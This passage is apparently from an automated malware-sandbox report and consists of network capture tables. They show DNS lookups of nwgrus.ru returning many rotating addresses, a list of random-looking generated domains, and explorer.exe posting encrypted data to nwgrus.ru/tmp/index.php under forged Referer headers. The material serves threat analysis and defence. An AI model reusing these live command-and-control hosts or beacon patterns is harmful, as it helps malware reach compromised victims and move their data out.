Oct 14, 2024 06:06:11.770308018 CEST	50038	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:06:11.775631905 CEST	80	50038	211.171.233.129	192.168.2.6
Oct 14, 2024 06:06:11.775715113 CEST	50038	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:06:11.776343107 CEST	50038	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:06:11.776376009 CEST	50038	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:06:11.781261921 CEST	80	50038	211.171.233.129	192.168.2.6
Oct 14, 2024 06:06:11.781315088 CEST	80	50038	211.171.233.129	192.168.2.6
Oct 14, 2024 06:06:13.269507885 CEST	80	50038	211.171.233.129	192.168.2.6
Oct 14, 2024 06:06:13.269561052 CEST	80	50038	211.171.233.129	192.168.2.6
Oct 14, 2024 06:06:13.270042896 CEST	50038	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:06:13.270133972 CEST	50038	80	192.168.2.6	211.171.233.129
Oct 14, 2024 06:06:13.275003910 CEST	80	50038	211.171.233.129	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 14, 2024 06:02:35.865875006 CEST	50932	53	192.168.2.6	1.1.1.1
Oct 14, 2024 06:02:36.859611034 CEST	50932	53	192.168.2.6	1.1.1.1
Oct 14, 2024 06:02:37.875413895 CEST	50932	53	192.168.2.6	1.1.1.1
Oct 14, 2024 06:02:39.880238056 CEST	50932	53	192.168.2.6	1.1.1.1
Oct 14, 2024 06:02:40.024979115 CEST	53	50932	1.1.1.1	192.168.2.6
Oct 14, 2024 06:02:40.025001049 CEST	53	50932	1.1.1.1	192.168.2.6
Oct 14, 2024 06:02:40.025012016 CEST	53	50932	1.1.1.1	192.168.2.6
Oct 14, 2024 06:02:40.025026083 CEST	53	50932	1.1.1.1	192.168.2.6
Oct 14, 2024 06:05:13.547768116 CEST	56060	53	192.168.2.6	1.1.1.1
Oct 14, 2024 06:05:14.563180923 CEST	56060	53	192.168.2.6	1.1.1.1
Oct 14, 2024 06:05:15.562882900 CEST	56060	53	192.168.2.6	1.1.1.1
Oct 14, 2024 06:05:16.538158894 CEST	53	56060	1.1.1.1	192.168.2.6
Oct 14, 2024 06:05:16.538187027 CEST	53	56060	1.1.1.1	192.168.2.6
Oct 14, 2024 06:05:16.538199902 CEST	53	56060	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 14, 2024 06:02:35.865875006 CEST	192.168.2.6	1.1.1.1	0xe2f4	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:36.859611034 CEST	192.168.2.6	1.1.1.1	0xe2f4	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:37.875413895 CEST	192.168.2.6	1.1.1.1	0xe2f4	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:39.880238056 CEST	192.168.2.6	1.1.1.1	0xe2f4	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:05:13.547768116 CEST	192.168.2.6	1.1.1.1	0x1cd3	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:05:14.563180923 CEST	192.168.2.6	1.1.1.1	0x1cd3	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:05:15.562882900 CEST	192.168.2.6	1.1.1.1	0x1cd3	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 14, 2024 06:02:40.024979115 CEST	1.1.1.1	192.168.2.6	0xe2f4	No error (0)	nwgrus.ru	125.7.253.10	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:40.024979115 CEST	1.1.1.1	192.168.2.6	0xe2f4	No error (0)	nwgrus.ru	211.171.233.129	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:40.024979115 CEST	1.1.1.1	192.168.2.6	0xe2f4	No error (0)	nwgrus.ru	190.147.128.172	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:40.024979115 CEST	1.1.1.1	192.168.2.6	0xe2f4	No error (0)	nwgrus.ru	189.181.56.137	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:40.024979115 CEST	1.1.1.1	192.168.2.6	0xe2f4	No error (0)	nwgrus.ru	109.98.58.98	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:40.024979115 CEST	1.1.1.1	192.168.2.6	0xe2f4	No error (0)	nwgrus.ru	200.45.93.45	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:40.024979115 CEST	1.1.1.1	192.168.2.6	0xe2f4	No error (0)	nwgrus.ru	187.204.42.174	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:40.024979115 CEST	1.1.1.1	192.168.2.6	0xe2f4	No error (0)	nwgrus.ru	196.189.156.245	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:40.024979115 CEST	1.1.1.1	192.168.2.6	0xe2f4	No error (0)	nwgrus.ru	148.230.249.9	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:40.024979115 CEST	1.1.1.1	192.168.2.6	0xe2f4	No error (0)	nwgrus.ru	105.197.97.247	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:40.025001049 CEST	1.1.1.1	192.168.2.6	0xe2f4	No error (0)	nwgrus.ru	125.7.253.10	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:40.025001049 CEST	1.1.1.1	192.168.2.6	0xe2f4	No error (0)	nwgrus.ru	211.171.233.129	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:40.025001049 CEST	1.1.1.1	192.168.2.6	0xe2f4	No error (0)	nwgrus.ru	190.147.128.172	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:40.025001049 CEST	1.1.1.1	192.168.2.6	0xe2f4	No error (0)	nwgrus.ru	189.181.56.137	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:40.025001049 CEST	1.1.1.1	192.168.2.6	0xe2f4	No error (0)	nwgrus.ru	109.98.58.98	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:40.025001049 CEST	1.1.1.1	192.168.2.6	0xe2f4	No error (0)	nwgrus.ru	200.45.93.45	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:40.025001049 CEST	1.1.1.1	192.168.2.6	0xe2f4	No error (0)	nwgrus.ru	187.204.42.174	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:40.025001049 CEST	1.1.1.1	192.168.2.6	0xe2f4	No error (0)	nwgrus.ru	196.189.156.245	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:40.025001049 CEST	1.1.1.1	192.168.2.6	0xe2f4	No error (0)	nwgrus.ru	148.230.249.9	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:40.025001049 CEST	1.1.1.1	192.168.2.6	0xe2f4	No error (0)	nwgrus.ru	105.197.97.247	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:40.025012016 CEST	1.1.1.1	192.168.2.6	0xe2f4	No error (0)	nwgrus.ru	125.7.253.10	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:40.025012016 CEST	1.1.1.1	192.168.2.6	0xe2f4	No error (0)	nwgrus.ru	211.171.233.129	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:40.025012016 CEST	1.1.1.1	192.168.2.6	0xe2f4	No error (0)	nwgrus.ru	190.147.128.172	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:40.025012016 CEST	1.1.1.1	192.168.2.6	0xe2f4	No error (0)	nwgrus.ru	189.181.56.137	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:40.025012016 CEST	1.1.1.1	192.168.2.6	0xe2f4	No error (0)	nwgrus.ru	109.98.58.98	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:40.025012016 CEST	1.1.1.1	192.168.2.6	0xe2f4	No error (0)	nwgrus.ru	200.45.93.45	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:40.025012016 CEST	1.1.1.1	192.168.2.6	0xe2f4	No error (0)	nwgrus.ru	187.204.42.174	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:40.025012016 CEST	1.1.1.1	192.168.2.6	0xe2f4	No error (0)	nwgrus.ru	196.189.156.245	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:40.025012016 CEST	1.1.1.1	192.168.2.6	0xe2f4	No error (0)	nwgrus.ru	148.230.249.9	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:40.025012016 CEST	1.1.1.1	192.168.2.6	0xe2f4	No error (0)	nwgrus.ru	105.197.97.247	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:40.025026083 CEST	1.1.1.1	192.168.2.6	0xe2f4	No error (0)	nwgrus.ru	125.7.253.10	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:40.025026083 CEST	1.1.1.1	192.168.2.6	0xe2f4	No error (0)	nwgrus.ru	211.171.233.129	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:40.025026083 CEST	1.1.1.1	192.168.2.6	0xe2f4	No error (0)	nwgrus.ru	190.147.128.172	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:40.025026083 CEST	1.1.1.1	192.168.2.6	0xe2f4	No error (0)	nwgrus.ru	189.181.56.137	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:40.025026083 CEST	1.1.1.1	192.168.2.6	0xe2f4	No error (0)	nwgrus.ru	109.98.58.98	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:40.025026083 CEST	1.1.1.1	192.168.2.6	0xe2f4	No error (0)	nwgrus.ru	200.45.93.45	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:40.025026083 CEST	1.1.1.1	192.168.2.6	0xe2f4	No error (0)	nwgrus.ru	187.204.42.174	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:40.025026083 CEST	1.1.1.1	192.168.2.6	0xe2f4	No error (0)	nwgrus.ru	196.189.156.245	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:40.025026083 CEST	1.1.1.1	192.168.2.6	0xe2f4	No error (0)	nwgrus.ru	148.230.249.9	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:02:40.025026083 CEST	1.1.1.1	192.168.2.6	0xe2f4	No error (0)	nwgrus.ru	105.197.97.247	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:05:16.538158894 CEST	1.1.1.1	192.168.2.6	0x1cd3	No error (0)	nwgrus.ru	211.171.233.129	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:05:16.538158894 CEST	1.1.1.1	192.168.2.6	0x1cd3	No error (0)	nwgrus.ru	190.147.128.172	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:05:16.538158894 CEST	1.1.1.1	192.168.2.6	0x1cd3	No error (0)	nwgrus.ru	189.181.56.137	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:05:16.538158894 CEST	1.1.1.1	192.168.2.6	0x1cd3	No error (0)	nwgrus.ru	109.98.58.98	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:05:16.538158894 CEST	1.1.1.1	192.168.2.6	0x1cd3	No error (0)	nwgrus.ru	200.45.93.45	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:05:16.538158894 CEST	1.1.1.1	192.168.2.6	0x1cd3	No error (0)	nwgrus.ru	187.204.42.174	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:05:16.538158894 CEST	1.1.1.1	192.168.2.6	0x1cd3	No error (0)	nwgrus.ru	196.189.156.245	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:05:16.538158894 CEST	1.1.1.1	192.168.2.6	0x1cd3	No error (0)	nwgrus.ru	148.230.249.9	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:05:16.538158894 CEST	1.1.1.1	192.168.2.6	0x1cd3	No error (0)	nwgrus.ru	105.197.97.247	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:05:16.538158894 CEST	1.1.1.1	192.168.2.6	0x1cd3	No error (0)	nwgrus.ru	125.7.253.10	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:05:16.538187027 CEST	1.1.1.1	192.168.2.6	0x1cd3	No error (0)	nwgrus.ru	211.171.233.129	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:05:16.538187027 CEST	1.1.1.1	192.168.2.6	0x1cd3	No error (0)	nwgrus.ru	190.147.128.172	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:05:16.538187027 CEST	1.1.1.1	192.168.2.6	0x1cd3	No error (0)	nwgrus.ru	189.181.56.137	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:05:16.538187027 CEST	1.1.1.1	192.168.2.6	0x1cd3	No error (0)	nwgrus.ru	109.98.58.98	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:05:16.538187027 CEST	1.1.1.1	192.168.2.6	0x1cd3	No error (0)	nwgrus.ru	200.45.93.45	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:05:16.538187027 CEST	1.1.1.1	192.168.2.6	0x1cd3	No error (0)	nwgrus.ru	187.204.42.174	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:05:16.538187027 CEST	1.1.1.1	192.168.2.6	0x1cd3	No error (0)	nwgrus.ru	196.189.156.245	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:05:16.538187027 CEST	1.1.1.1	192.168.2.6	0x1cd3	No error (0)	nwgrus.ru	148.230.249.9	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:05:16.538187027 CEST	1.1.1.1	192.168.2.6	0x1cd3	No error (0)	nwgrus.ru	105.197.97.247	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:05:16.538187027 CEST	1.1.1.1	192.168.2.6	0x1cd3	No error (0)	nwgrus.ru	125.7.253.10	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:05:16.538199902 CEST	1.1.1.1	192.168.2.6	0x1cd3	No error (0)	nwgrus.ru	211.171.233.129	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:05:16.538199902 CEST	1.1.1.1	192.168.2.6	0x1cd3	No error (0)	nwgrus.ru	190.147.128.172	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:05:16.538199902 CEST	1.1.1.1	192.168.2.6	0x1cd3	No error (0)	nwgrus.ru	189.181.56.137	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:05:16.538199902 CEST	1.1.1.1	192.168.2.6	0x1cd3	No error (0)	nwgrus.ru	109.98.58.98	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:05:16.538199902 CEST	1.1.1.1	192.168.2.6	0x1cd3	No error (0)	nwgrus.ru	200.45.93.45	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:05:16.538199902 CEST	1.1.1.1	192.168.2.6	0x1cd3	No error (0)	nwgrus.ru	187.204.42.174	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:05:16.538199902 CEST	1.1.1.1	192.168.2.6	0x1cd3	No error (0)	nwgrus.ru	196.189.156.245	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:05:16.538199902 CEST	1.1.1.1	192.168.2.6	0x1cd3	No error (0)	nwgrus.ru	148.230.249.9	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:05:16.538199902 CEST	1.1.1.1	192.168.2.6	0x1cd3	No error (0)	nwgrus.ru	105.197.97.247	A (IP address)	IN (0x0001)	false
Oct 14, 2024 06:05:16.538199902 CEST	1.1.1.1	192.168.2.6	0x1cd3	No error (0)	nwgrus.ru	125.7.253.10	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

fxrdkpxlrlca.com

nwgrus.ru

rxkflswhfdlbttc.org

tagqqmqbryxkm.org

plwcwjrcahoa.net

pucwrkwjfycmguw.com

tqcdafuvgwwyn.com

dujexgghfqd.net

qhntbwctbsxu.com

numxyybjlxnij.org

qxvvlpafyplsfmh.net

agcejdimcyykepgs.org

sbsqbgjbfyr.com

kqejwgffiikyio.org

evinpfxalwnnmcek.net

vsgvwtqctrqw.com

aspcynlesjwhi.net

jkejxmgpctomkc.net

doyodlaoiwpyujb.com

foywayqrovd.org

eekncfsmpbrkmlo.com

clxaxfnyuedfqps.com

uimdgsgyvhhaem.com

eeyuetrukjpircst.net

ydaciekeaeuaol.org

voyqfwrggnp.net

blxnotvrjvnu.org

fplvqqohjqdma.com

rdjriakbylriblg.org

sgyfmqyxpkmdbygm.net

eyrnjiqpamojnvp.com

rlfugmueckmpbf.com

hykquqealhec.org

wcfowkxogmtykxos.net

mxgxdupfkhdkpgcd.org

wrowxfwdtnqpxb.com

shukyhyxsnyt.com

oytavkgbvwgngwdq.net

qcthmhytlnkrqkwa.org

irmipcatkrgbgkn.org

cxjsppdhykfhkdy.net

wmcfxulhyyb.net

nhfvlqknfjyv.net

kdpqwaweroenq.com

qymlmmmarfrlf.org

sjchoqywbhy.net

lfpsmslcgfbr.org

vpqrqumkciggjbf.net

yprnusgmnhodqa.org

hwgseaeonxo.org

lxdpanclboemkjpp.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49862	125.7.253.10	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:02:40.032846928 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fxrdkpxlrlca.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 303 Host: nwgrus.ru
Oct 14, 2024 06:02:40.032867908 CEST	303	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7e 30 b2 ad Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA .[k,vu~0P/BPstu8g4g:vC>-49BOSp`P1QdSsA7$XFzE,@L(mq_YVsVCo
Oct 14, 2024 06:02:41.580789089 CEST	152	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:02:41 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 04 00 00 00 72 e8 87 e8 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49873	125.7.253.10	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:02:41.594649076 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rxkflswhfdlbttc.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 178 Host: nwgrus.ru
Oct 14, 2024 06:02:41.594671965 CEST	178	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 72 0c de fb Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vurbTjRI]Q4)/UqmAR!-G]7Ty6E5'm9t$A
Oct 14, 2024 06:02:43.242265940 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:02:42 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49884	125.7.253.10	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:02:43.255192995 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tagqqmqbryxkm.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 222 Host: nwgrus.ru
Oct 14, 2024 06:02:43.255213976 CEST	222	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 77 24 a3 91 Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vuw$GP\|TCya$$5a_O&'et#Q{I)P7BrD}TGq%[Y\X}oqf5
Oct 14, 2024 06:02:44.741344929 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:02:44 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49895	125.7.253.10	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:02:44.749665976 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://plwcwjrcahoa.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 295 Host: nwgrus.ru
Oct 14, 2024 06:02:44.749686003 CEST	295	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 3e 50 c9 a1 Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vu>Px0q]I/}q?\6e>j0AAG>%'RW5<`~h73V>"p6R3gN.CG=V0~'jST
Oct 14, 2024 06:02:46.242067099 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:02:45 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49906	125.7.253.10	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 06:02:46.250042915 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pucwrkwjfycmguw.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 241 Host: nwgrus.ru
Oct 14, 2024 06:02:46.250042915 CEST	241	OUT	Data Raw: 3b 6e 22 16 80 cd 1c 53 d8 db b5 03 01 70 7b bc 7b 09 ce e6 1f 09 e1 6a 00 7f 7f 97 45 c5 c3 1d 9e 5e b4 2a 07 65 24 6a e8 e9 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 4c 08 af b9 Data Ascii: ;n"Sp{{jE^*e$j?!0jHYcM@NA -[k,vuLl=oFk&+b45-k:g/YI#n'LPg';)_2(z.CVDguImkv$z
Oct 14, 2024 06:02:47.819247007 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 04:02:47 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 